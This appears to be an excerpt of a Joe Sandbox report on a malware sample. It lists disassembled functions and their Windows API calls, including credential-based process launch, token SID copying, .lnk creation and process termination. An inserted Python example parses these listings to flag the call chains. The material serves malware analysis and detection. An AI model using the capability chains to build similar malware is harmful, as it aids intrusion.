                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00B14C95
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B14CB2
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B14CEA
                                                                                                                  • _wcslen.LIBCMT ref: 00B14D08
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B14D10
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B14D1A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 72514467-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                  • _wcslen.LIBCMT ref: 00B2587B
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B25995
                                                                                                                  • CoCreateInstance.OLE32(00B4FCF8,00000000,00000001,00B4FB68,?), ref: 00B259AE
                                                                                                                  • CoUninitialize.OLE32 ref: 00B259CC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 3172280962-24824748
                                                                                                                  • Opcode ID: e504aa0774c0df617a4c918217f628715d546a92af4865f69640b12a970b83e5
                                                                                                                  • Instruction ID: 6563bc8d5c8ea411b280c9bbbb43f01a654c7f67fa7c6df5d9c9741b10971638
                                                                                                                  • Opcode Fuzzy Hash: e504aa0774c0df617a4c918217f628715d546a92af4865f69640b12a970b83e5
                                                                                                                  • Instruction Fuzzy Hash: 77D182706087119FC724DF24D584A6ABBE5FF89710F10899DF88A9B362DB31EC45CB92
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B10FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B10FCA
                                                                                                                    • Part of subcall function 00B10FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B10FD6
                                                                                                                    • Part of subcall function 00B10FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B10FE5
                                                                                                                    • Part of subcall function 00B10FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B10FEC
                                                                                                                    • Part of subcall function 00B10FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B11002
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00B11335), ref: 00B117AE
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B117BA
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B117C1
                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B117DA
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00B11335), ref: 00B117EE
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B117F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3008561057-0
                                                                                                                  • Opcode ID: d1dd6d6ee5cf2afd192264f3c1104e19c07421d885155473d01b2d5d87f0377c
                                                                                                                  • Instruction ID: 56798bce49983ad08bc427b653d47f1c7fdf6e377d3ca0fe709729bec9cafa25
                                                                                                                  • Opcode Fuzzy Hash: d1dd6d6ee5cf2afd192264f3c1104e19c07421d885155473d01b2d5d87f0377c
                                                                                                                  • Instruction Fuzzy Hash: 0C11AF75502205EFDB10DFA8CC49BEE7BE9FB42755F504468F681A7250CB359E80CB60
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B114FF
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B11506
                                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B11515
                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00B11520
                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1154F
                                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B11563
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1413079979-0
                                                                                                                  • Opcode ID: 40fb87d0656c2cce70d374d40995b1e15a01ed097b65e2324c7acdeadc360525
                                                                                                                  • Instruction ID: 2494bbceb3caf3c066777411e7413f1079fdb9350042035572eec760e63b97dd
                                                                                                                  • Opcode Fuzzy Hash: 40fb87d0656c2cce70d374d40995b1e15a01ed097b65e2324c7acdeadc360525
                                                                                                                  • Instruction Fuzzy Hash: F3115976602209ABDF11CF98DD49BDE7BA9FF49B04F044064FA05A2160C775CEA0DB60
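                                                                                                                   The three function listings above (CoCreateInstance next to the ".lnk" string, the token SID copy, and the OpenProcessToken / CreateEnvironmentBlock / CreateProcessWithLogonW sequence) are the kind of API chains an analyst wants to pull out of a report of this size mechanically. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses "APIs" listings in exactly the line format used on this page, keeps the "Part of subcall function" attribution, and flags ordered API chains. The input is a constructed excerpt of this page's own lines, and the chain labels are this example's own interpretation, not classifications Joe Sandbox assigns.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three function listings from this report, trimmed to the
# lines the parser reads. Addresses and arguments are copied from the listing.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
• _wcslen.LIBCMT ref: 00B2587B
• CoInitialize.OLE32(00000000), ref: 00B25995
• CoCreateInstance.OLE32(00B4FCF8,00000000,00000001,00B4FB68,?), ref: 00B259AE
• CoUninitialize.OLE32 ref: 00B259CC
Similarity
• String ID: .lnk
APIs
  • Part of subcall function 00B10FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B10FCA
  • Part of subcall function 00B10FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B10FEC
• GetLengthSid.ADVAPI32(?,00000000,00B11335), ref: 00B117AE
• HeapAlloc.KERNEL32(00000000), ref: 00B117C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00B117DA
• HeapFree.KERNEL32(00000000), ref: 00B117F5
Similarity
• String ID:
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B114FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00B11506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B11515
• CloseHandle.KERNEL32(00000004), ref: 00B11520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00B11563
Similarity
• String ID:
"""

# One "• Api.MODULE(args), ref: ADDR" line; the argument list and the
# "Part of subcall function" prefix are both optional in the report.
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s+String ID:\s*(?P<s>.*?)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when attributed to a subcall


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    string_id: str = ""


def parse_listing(text: str) -> list:
    """Split the report text into one FunctionBlock per 'APIs' section."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = STRING_RE.match(line)
        if m:
            cur.string_id = m["s"]
    return blocks


def has_chain(block: FunctionBlock, chain: tuple, include_subcalls: bool = True) -> bool:
    """True if the chain's APIs appear in this order (other calls may intervene)."""
    if not chain:
        return True
    names = [c.api for c in block.calls if include_subcalls or c.subcall_of is None]
    pos = 0
    for name in names:
        if name == chain[pos]:
            pos += 1
            if pos == len(chain):
                return True
    return False


# Hypothetical chain labels for this example; the optional string must occur in the
# block's "String ID" for the chain to count.
SIGNATURES = {
    "process started under other credentials (CreateProcessWithLogonW)":
        (("OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"), None),
    "user SID copied out of a process token":
        (("GetTokenInformation", "GetLengthSid", "CopySid"), None),
    "COM object created alongside a .lnk string":
        (("CoInitialize", "CoCreateInstance", "CoUninitialize"), ".lnk"),
}


def classify(blocks: list) -> list:
    """Return (block index, label, address of the chain's last call) for each match."""
    hits = []
    for i, b in enumerate(blocks):
        for label, (chain, needed) in SIGNATURES.items():
            if has_chain(b, chain) and (needed is None or needed in b.string_id):
                last_ref = [c.ref for c in b.calls if c.api == chain[-1]][-1]
                hits.append((i, label, last_ref))
    return hits


if __name__ == "__main__":
    for idx, label, ref in classify(parse_listing(SAMPLE_LISTING)):
        print(f"block {idx}: {label} at {ref}")
```

                                                                                                                   The chains are matched as ordered subsequences of the listing, which follows address order within each function; that is evidence of what the code can do, not a record of what executed in the sandbox run. Subcall-attributed lines are included by default because the report itself places GetTokenInformation only in the subcall; pass include_subcalls=False to restrict a chain to the function's own calls.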
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00AD3379,00AD2FE5), ref: 00AD3390
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD339E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD33B7
                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AD3379,00AD2FE5), ref: 00AD3409
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 1e4260d3287bfc920cc5bfa65752948c94a4ff55bc151d0e2a4c0a72db0b3829
                                                                                                                  • Instruction ID: 719a306d481be65cb86d70bdd36074f669ccd0cc26224a90649c83912a6bc2df
                                                                                                                  • Opcode Fuzzy Hash: 1e4260d3287bfc920cc5bfa65752948c94a4ff55bc151d0e2a4c0a72db0b3829
                                                                                                                  • Instruction Fuzzy Hash: E2012433209311BEAE262BB47E856673E94FB05779320022FF412863F0EF218E019286
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00AE5686,00AF3CD6,?,00000000,?,00AE5B6A,?,?,?,?,?,00ADE6D1,?,00B78A48), ref: 00AE2D78
                                                                                                                  • _free.LIBCMT ref: 00AE2DAB
                                                                                                                  • _free.LIBCMT ref: 00AE2DD3
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ADE6D1,?,00B78A48,00000010,00AB4F4A,?,?,00000000,00AF3CD6), ref: 00AE2DE0
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ADE6D1,?,00B78A48,00000010,00AB4F4A,?,?,00000000,00AF3CD6), ref: 00AE2DEC
                                                                                                                  • _abort.LIBCMT ref: 00AE2DF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3160817290-0
                                                                                                                  • Opcode ID: 8a30faf23c6965837871ae2e8f83aadb04840eda91d7fd7023bfaec3e8b05bc8
                                                                                                                  • Instruction ID: 521a4690418bae53726ec606cbcec4d710e4f59aa6c01d4ba470d57664edf827
                                                                                                                  • Opcode Fuzzy Hash: 8a30faf23c6965837871ae2e8f83aadb04840eda91d7fd7023bfaec3e8b05bc8
                                                                                                                  • Instruction Fuzzy Hash: 1FF0283690568027D6523737BD4AF5A2A6DBFC2BA0F314028FA24D31E2EE3489014320
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96A2
                                                                                                                    • Part of subcall function 00AC9639: BeginPath.GDI32(?), ref: 00AC96B9
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96E2
                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B48A4E
                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00B48A62
                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B48A70
                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00B48A80
                                                                                                                  • EndPath.GDI32(?), ref: 00B48A90
                                                                                                                  • StrokePath.GDI32(?), ref: 00B48AA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 43455801-0
                                                                                                                  • Opcode ID: c5c9f293d2a4be07704f2305a997fef838ca33781220c96f384e88bfa4ddac0c
                                                                                                                  • Instruction ID: 70ff67ca2447004e461260e4e8efc2a643eb6c1c266d773915e43f03ab9b7e2f
                                                                                                                  • Opcode Fuzzy Hash: c5c9f293d2a4be07704f2305a997fef838ca33781220c96f384e88bfa4ddac0c
                                                                                                                  • Instruction Fuzzy Hash: E3110976001148FFDB129F94DC88EAA7FACFB09350F048052FA199A1A1CB719E55DBA0
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00B15218
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B15229
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B15230
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B15238
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B1524F
                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B15261
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1035833867-0
                                                                                                                  • Opcode ID: bbd6955ed1384cf42175952df5276a74e6fefe6d3cc8a9cf6e8768c811094cdd
                                                                                                                  • Instruction ID: 8aaded497f3ad952278b8365829afa691d4fde413275adc9c4b0990a12932619
                                                                                                                  • Opcode Fuzzy Hash: bbd6955ed1384cf42175952df5276a74e6fefe6d3cc8a9cf6e8768c811094cdd
                                                                                                                  • Instruction Fuzzy Hash: 24018F75A01709BBEB109BA59C49A5EBFB8FB49751F044065FA04A7290DA709900CBA0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB1BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB1BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB1C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB1C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB1C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB1C22
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: e7c32529dd99d47d20da146416c0309d7d954e9533f54af4c1dd2baa644f40b2
• Instruction ID: 43573fcf5b6f4ec1f2a2a78a37e8350881acb7c63b9f4302ff48a3f5d903e625
• Opcode Fuzzy Hash: e7c32529dd99d47d20da146416c0309d7d954e9533f54af4c1dd2baa644f40b2
• Instruction Fuzzy Hash: E90144B0902B5ABDE3008F6A8C85A52FEA8FF19754F00411BA15C4BA42C7B5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B1EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B1EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 00B1EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB75
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 4b5abe5627a95f30508dd26ce58781423643b65a12d17eae8dd64b1d94392079
• Instruction ID: b98ab1f61ec83bd1b207fc52b42d0bf589b6d1f13ed429170eae3f53b7263c24
• Opcode Fuzzy Hash: 4b5abe5627a95f30508dd26ce58781423643b65a12d17eae8dd64b1d94392079
• Instruction Fuzzy Hash: 85F0177A642158BBE6615B629C0EEEB3E7CFBCBF11F004158FA11E20919BA05B0186B5
APIs
• GetClientRect.USER32(?), ref: 00B07452
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00B07469
• GetWindowDC.USER32(?), ref: 00B07475
• GetPixel.GDI32(00000000,?,?), ref: 00B07484
• ReleaseDC.USER32(?,00000000), ref: 00B07496
• GetSysColor.USER32(00000005), ref: 00B074B0
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
• Opcode ID: ff4190dc1fc10b6d6727a7057ac1bc2212495e06c92a12f8100d2383f27a451e
• Instruction ID: 81c0b5cde064c5e1fcb46a240f3ae426e9e69a8c76d0d888f9530a39fd1da82b
• Opcode Fuzzy Hash: ff4190dc1fc10b6d6727a7057ac1bc2212495e06c92a12f8100d2383f27a451e
• Instruction Fuzzy Hash: 67017435801215EFEB905FA4DC09BAEBFB5FB05721F2240A4F916A31A1CF312E41EB10
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1187F
• UnloadUserProfile.USERENV(?,?), ref: 00B1188B
• CloseHandle.KERNEL32(?), ref: 00B11894
• CloseHandle.KERNEL32(?), ref: 00B1189C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00B118A5
• HeapFree.KERNEL32(00000000), ref: 00B118AC
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: c4657fa840b04385ba7206ea63ed9678d9dad964e7a0d7580c62de3fcedd3a75
• Instruction ID: 60fa885d85140ea3257df57c434c72636f6a4316f145f90d2521a83fe8033288
